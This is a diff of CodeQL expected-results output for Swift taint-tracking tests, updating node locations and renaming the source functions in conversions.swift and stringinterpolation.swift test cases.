[Collection element] | +| conversions.swift:39:19:39:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:40:12:40:12 | arr | semmle.label | arr | | conversions.swift:41:12:41:12 | arr [Collection element] | semmle.label | arr [Collection element] | | conversions.swift:41:12:41:17 | ...[...] | semmle.label | ...[...] | @@ -227,84 +227,84 @@ nodes | conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | | conversions.swift:43:12:43:26 | ...[...] | semmle.label | ...[...] | | conversions.swift:43:20:43:20 | arr [Collection element] | semmle.label | arr [Collection element] | -| conversions.swift:44:12:44:39 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | -| conversions.swift:44:20:44:33 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:44:20:44:35 | .utf8 | semmle.label | .utf8 | -| conversions.swift:45:12:45:39 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:45:12:45:42 | ...[...] | semmle.label | ...[...] | -| conversions.swift:45:20:45:33 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:45:20:45:35 | .utf8 | semmle.label | .utf8 | -| conversions.swift:47:13:47:23 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:44:12:44:48 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | +| conversions.swift:44:20:44:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:44:20:44:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:45:12:45:51 | ...[...] | semmle.label | ...[...] | +| conversions.swift:45:20:45:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:45:20:45:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:47:13:47:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:48:13:48:13 | v | semmle.label | v | -| conversions.swift:51:18:51:41 | call to numericCast(_:) | semmle.label | call to numericCast(_:) | -| conversions.swift:51:30:51:40 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:51:18:51:50 | call to numericCast(_:) | semmle.label | call to numericCast(_:) | +| conversions.swift:51:30:51:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:52:12:52:12 | v2 | semmle.label | v2 | -| conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | -| conversions.swift:54:31:54:41 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | +| conversions.swift:54:31:54:50 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:55:12:55:12 | v4 | semmle.label | v4 | -| conversions.swift:63:11:63:26 | call to abs(_:) | semmle.label | call to abs(_:) | -| conversions.swift:63:15:63:25 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:63:11:63:35 | call to abs(_:) | semmle.label | call to abs(_:) | +| conversions.swift:63:15:63:34 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:64:12:64:12 | v7 | semmle.label | v7 | -| conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | -| conversions.swift:75:12:75:42 | ...! | semmle.label | ...! | -| conversions.swift:75:16:75:29 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | -| conversions.swift:77:30:77:40 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | -| conversions.swift:78:27:78:37 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:79:12:79:22 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:79:12:79:24 | .littleEndian | semmle.label | .littleEndian | -| conversions.swift:80:12:80:22 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:80:12:80:24 | .bigEndian | semmle.label | .bigEndian | -| conversions.swift:108:12:108:24 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:109:12:109:31 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:109:18:109:30 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:111:12:111:32 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:111:19:111:31 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:112:12:112:32 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:112:12:112:34 | .utf8 | semmle.label | .utf8 | -| conversions.swift:112:19:112:31 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:113:12:113:34 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:113:19:113:33 | call to sourceFloat80() | semmle.label | call to sourceFloat80() | -| conversions.swift:114:12:114:34 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:114:12:114:36 | .utf8 | semmle.label | .utf8 | -| conversions.swift:114:19:114:33 | call to sourceFloat80() | semmle.label | call to sourceFloat80() | -| conversions.swift:115:12:115:33 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:115:19:115:32 | call to sourceDouble() | semmle.label | call to sourceDouble() | -| conversions.swift:116:12:116:33 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:116:12:116:35 | .utf8 | semmle.label | .utf8 | -| conversions.swift:116:19:116:32 | call to sourceDouble() | semmle.label | call to sourceDouble() | -| conversions.swift:118:12:118:31 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:118:18:118:30 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | -| conversions.swift:119:41:119:51 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:57:120:69 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | semmle.label | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:122:44:122:56 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:124:12:124:24 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:124:12:124:26 | .exponent | semmle.label | .exponent | -| conversions.swift:125:12:125:24 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:125:12:125:26 | .significand | semmle.label | .significand | -| conversions.swift:126:12:126:26 | call to sourceFloat80() | semmle.label | call to sourceFloat80() | -| conversions.swift:126:12:126:28 | .exponent | semmle.label | .exponent | -| conversions.swift:127:12:127:26 | call to sourceFloat80() | semmle.label | call to sourceFloat80() | -| conversions.swift:127:12:127:28 | .significand | semmle.label | .significand | -| conversions.swift:128:12:128:25 | call to sourceDouble() | semmle.label | call to sourceDouble() | -| conversions.swift:128:12:128:27 | .exponent | semmle.label | .exponent | -| conversions.swift:129:12:129:25 | call to sourceDouble() | semmle.label | call to sourceDouble() | -| conversions.swift:129:12:129:27 | .significand | semmle.label | .significand | -| conversions.swift:135:12:135:25 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:136:12:136:33 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:136:19:136:32 | call to sourceString() | semmle.label | call to sourceString() | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | semmle.label | call to MyString.init(_:) | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) [some:0] | semmle.label | call to MyString.init(_:) [some:0] | -| conversions.swift:144:12:144:36 | ...! | semmle.label | ...! | -| conversions.swift:144:21:144:34 | call to sourceString() | semmle.label | call to sourceString() | +| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | +| conversions.swift:75:12:75:51 | ...! | semmle.label | ...! | +| conversions.swift:75:16:75:38 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | +| conversions.swift:77:30:77:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | +| conversions.swift:78:27:78:46 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:79:12:79:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:79:12:79:33 | .littleEndian | semmle.label | .littleEndian | +| conversions.swift:80:12:80:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:80:12:80:33 | .bigEndian | semmle.label | .bigEndian | +| conversions.swift:108:12:108:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:109:12:109:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:111:12:111:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:112:12:112:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:112:12:112:43 | .utf8 | semmle.label | .utf8 | +| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:113:12:113:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:114:12:114:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:114:12:114:45 | .utf8 | semmle.label | .utf8 | +| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:115:12:115:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:116:12:116:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:116:12:116:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:118:12:118:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | +| conversions.swift:119:41:119:60 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | +| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | semmle.label | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:124:12:124:35 | .exponent | semmle.label | .exponent | +| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:125:12:125:35 | .significand | semmle.label | .significand | +| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:126:12:126:37 | .exponent | semmle.label | .exponent | +| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:127:12:127:37 | .significand | semmle.label | .significand | +| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:128:12:128:36 | .exponent | semmle.label | .exponent | +| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:129:12:129:36 | .significand | semmle.label | .significand | +| conversions.swift:135:12:135:35 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:136:12:136:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:136:19:136:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | semmle.label | call to MyString.init(_:) | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | semmle.label | call to MyString.init(_:) [some:0] | +| conversions.swift:144:12:144:46 | ...! | semmle.label | ...! | +| conversions.swift:144:21:144:44 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | | conversions.swift:145:12:145:12 | ms2 | semmle.label | ms2 | | conversions.swift:146:12:146:16 | .description | semmle.label | .description | | conversions.swift:147:12:147:16 | .debugDescription | semmle.label | .debugDescription | -| conversions.swift:152:31:152:44 | call to sourceString() | semmle.label | call to sourceString() | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | | conversions.swift:153:12:153:12 | parent | semmle.label | parent | | conversions.swift:154:12:154:12 | parent | semmle.label | parent | | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | semmle.label | call to unsafeDowncast(_:to:) | @@ -312,8 +312,8 @@ nodes | conversions.swift:157:12:157:12 | v3 | semmle.label | v3 | | conversions.swift:158:12:158:12 | v3 | semmle.label | v3 | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | -| conversions.swift:172:14:172:26 | [...] [Collection element] | semmle.label | [...] [Collection element] | -| conversions.swift:172:15:172:25 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:172:14:172:33 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| conversions.swift:172:15:172:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:173:13:173:13 | arr1 | semmle.label | arr1 | | conversions.swift:174:13:174:13 | arr2 | semmle.label | arr2 | | conversions.swift:175:13:175:19 | ...[...] | semmle.label | ...[...] | @@ -361,15 +361,15 @@ nodes | conversions.swift:225:13:225:25 | .v | semmle.label | .v | | conversions.swift:226:10:226:10 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:226:10:226:22 | .v | semmle.label | .v | -| conversions.swift:232:26:232:37 | call to sourceUInt() | semmle.label | call to sourceUInt() | -| conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:235:37:235:47 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | semmle.label | call to Int.init(withMyValue2:) | -| conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:238:38:238:48 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | semmle.label | call to mkInt(withMyValue:) | -| conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:241:43:241:53 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:232:26:232:43 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | +| conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:235:37:235:53 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | semmle.label | call to Int.init(withMyValue2:) | +| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:238:38:238:54 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | semmle.label | call to mkInt(withMyValue:) | +| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:241:43:241:59 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | file://:0:0:0:0 | .first | semmle.label | .first | | file://:0:0:0:0 | .second | semmle.label | .second | | file://:0:0:0:0 | .v | semmle.label | .v | @@ -500,11 +500,11 @@ subpaths | conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:219:11:219:24 | .v | | conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:225:13:225:25 | .v | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:226:10:226:22 | .v | -| conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | -| conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:217:2:222:2 | self[return] | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | -| conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | -| conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | -| conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | +| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | +| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:217:2:222:2 | self[return] | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | +| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | +| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | +| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | | stringinterpolation.swift:13:36:13:36 | pair [first] | stringinterpolation.swift:6:6:6:6 | self [first] | file://:0:0:0:0 | .first | stringinterpolation.swift:13:36:13:41 | .first | | stringinterpolation.swift:19:13:19:20 | call to source() | stringinterpolation.swift:6:6:6:6 | value | stringinterpolation.swift:6:6:6:6 | self [Return] [first] | stringinterpolation.swift:19:2:19:2 | [post] p1 [first] | | stringinterpolation.swift:22:21:22:21 | p1 [first] | stringinterpolation.swift:6:6:6:6 | self [first] | file://:0:0:0:0 | .first | stringinterpolation.swift:22:21:22:24 | .first | @@ -513,71 +513,71 @@ subpaths | stringinterpolation.swift:28:14:28:21 | call to source() | stringinterpolation.swift:7:6:7:6 | value | stringinterpolation.swift:7:6:7:6 | self [Return] [second] | stringinterpolation.swift:28:2:28:2 | [post] p2 [second] | | stringinterpolation.swift:31:21:31:21 | p2 [second] | stringinterpolation.swift:7:6:7:6 | self [second] | file://:0:0:0:0 | .second | stringinterpolation.swift:31:21:31:24 | .second | #select -| conversions.swift:32:12:32:22 | call to sourceInt() | conversions.swift:32:12:32:22 | call to sourceInt() | conversions.swift:32:12:32:22 | call to sourceInt() | result | -| conversions.swift:35:12:35:29 | call to Float.init(_:) | conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | result | -| conversions.swift:36:12:36:30 | call to String.init(_:) | conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | result | -| conversions.swift:37:12:37:32 | .utf8 | conversions.swift:37:19:37:29 | call to sourceInt() | conversions.swift:37:12:37:32 | .utf8 | result | -| conversions.swift:40:12:40:12 | arr | conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:40:12:40:12 | arr | result | -| conversions.swift:41:12:41:17 | ...[...] | conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:41:12:41:17 | ...[...] | result | -| conversions.swift:42:12:42:23 | call to Array.init(_:) | conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:42:12:42:23 | call to Array.init(_:) | result | -| conversions.swift:43:12:43:26 | ...[...] | conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:43:12:43:26 | ...[...] | result | -| conversions.swift:44:12:44:39 | call to Array.init(_:) | conversions.swift:44:20:44:33 | call to sourceString() | conversions.swift:44:12:44:39 | call to Array.init(_:) | result | -| conversions.swift:45:12:45:42 | ...[...] | conversions.swift:45:20:45:33 | call to sourceString() | conversions.swift:45:12:45:42 | ...[...] | result | -| conversions.swift:48:13:48:13 | v | conversions.swift:47:13:47:23 | call to sourceInt() | conversions.swift:48:13:48:13 | v | result | -| conversions.swift:52:12:52:12 | v2 | conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:52:12:52:12 | v2 | result | -| conversions.swift:55:12:55:12 | v4 | conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:55:12:55:12 | v4 | result | -| conversions.swift:64:12:64:12 | v7 | conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:64:12:64:12 | v7 | result | -| conversions.swift:75:12:75:42 | ...! | conversions.swift:75:16:75:29 | call to sourceString() | conversions.swift:75:12:75:42 | ...! | result | -| conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | result | -| conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | result | -| conversions.swift:79:12:79:24 | .littleEndian | conversions.swift:79:12:79:22 | call to sourceInt() | conversions.swift:79:12:79:24 | .littleEndian | result | -| conversions.swift:80:12:80:24 | .bigEndian | conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | result | -| conversions.swift:108:12:108:24 | call to sourceFloat() | conversions.swift:108:12:108:24 | call to sourceFloat() | conversions.swift:108:12:108:24 | call to sourceFloat() | result | -| conversions.swift:109:12:109:31 | call to Float.init(_:) | conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | result | -| conversions.swift:111:12:111:32 | call to String.init(_:) | conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | result | -| conversions.swift:112:12:112:34 | .utf8 | conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:34 | .utf8 | result | -| conversions.swift:113:12:113:34 | call to String.init(_:) | conversions.swift:113:19:113:33 | call to sourceFloat80() | conversions.swift:113:12:113:34 | call to String.init(_:) | result | -| conversions.swift:114:12:114:36 | .utf8 | conversions.swift:114:19:114:33 | call to sourceFloat80() | conversions.swift:114:12:114:36 | .utf8 | result | -| conversions.swift:115:12:115:33 | call to String.init(_:) | conversions.swift:115:19:115:32 | call to sourceDouble() | conversions.swift:115:12:115:33 | call to String.init(_:) | result | -| conversions.swift:116:12:116:35 | .utf8 | conversions.swift:116:19:116:32 | call to sourceDouble() | conversions.swift:116:12:116:35 | .utf8 | result | -| conversions.swift:118:12:118:31 | call to Float.init(_:) | conversions.swift:118:18:118:30 | call to sourceFloat() | conversions.swift:118:12:118:31 | call to Float.init(_:) | result | -| conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | conversions.swift:119:41:119:51 | call to sourceInt() | conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | result | -| conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | conversions.swift:120:57:120:69 | call to sourceFloat() | conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | result | -| conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | conversions.swift:122:44:122:56 | call to sourceFloat() | conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | result | -| conversions.swift:124:12:124:26 | .exponent | conversions.swift:124:12:124:24 | call to sourceFloat() | conversions.swift:124:12:124:26 | .exponent | result | -| conversions.swift:125:12:125:26 | .significand | conversions.swift:125:12:125:24 | call to sourceFloat() | conversions.swift:125:12:125:26 | .significand | result | -| conversions.swift:126:12:126:28 | .exponent | conversions.swift:126:12:126:26 | call to sourceFloat80() | conversions.swift:126:12:126:28 | .exponent | result | -| conversions.swift:127:12:127:28 | .significand | conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | result | -| conversions.swift:128:12:128:27 | .exponent | conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | result | -| conversions.swift:129:12:129:27 | .significand | conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | result | -| conversions.swift:135:12:135:25 | call to sourceString() | conversions.swift:135:12:135:25 | call to sourceString() | conversions.swift:135:12:135:25 | call to sourceString() | result | -| conversions.swift:136:12:136:33 | call to String.init(_:) | conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | result | -| conversions.swift:145:12:145:12 | ms2 | conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:145:12:145:12 | ms2 | result | -| conversions.swift:146:12:146:16 | .description | conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:146:12:146:16 | .description | result | -| conversions.swift:147:12:147:16 | .debugDescription | conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:147:12:147:16 | .debugDescription | result | -| conversions.swift:153:12:153:12 | parent | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:153:12:153:12 | parent | result | -| conversions.swift:154:12:154:12 | parent | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:154:12:154:12 | parent | result | -| conversions.swift:157:12:157:12 | v3 | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:157:12:157:12 | v3 | result | -| conversions.swift:158:12:158:12 | v3 | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:158:12:158:12 | v3 | result | +| conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | result | +| conversions.swift:35:12:35:38 | call to Float.init(_:) | conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | result | +| conversions.swift:36:12:36:39 | call to String.init(_:) | conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | result | +| conversions.swift:37:12:37:41 | .utf8 | conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:41 | .utf8 | result | +| conversions.swift:40:12:40:12 | arr | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:40:12:40:12 | arr | result | +| conversions.swift:41:12:41:17 | ...[...] | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:41:12:41:17 | ...[...] | result | +| conversions.swift:42:12:42:23 | call to Array.init(_:) | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:42:12:42:23 | call to Array.init(_:) | result | +| conversions.swift:43:12:43:26 | ...[...] | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:43:12:43:26 | ...[...] | result | +| conversions.swift:44:12:44:48 | call to Array.init(_:) | conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:12:44:48 | call to Array.init(_:) | result | +| conversions.swift:45:12:45:51 | ...[...] | conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:12:45:51 | ...[...] | result | +| conversions.swift:48:13:48:13 | v | conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:48:13:48:13 | v | result | +| conversions.swift:52:12:52:12 | v2 | conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:52:12:52:12 | v2 | result | +| conversions.swift:55:12:55:12 | v4 | conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:55:12:55:12 | v4 | result | +| conversions.swift:64:12:64:12 | v7 | conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:64:12:64:12 | v7 | result | +| conversions.swift:75:12:75:51 | ...! | 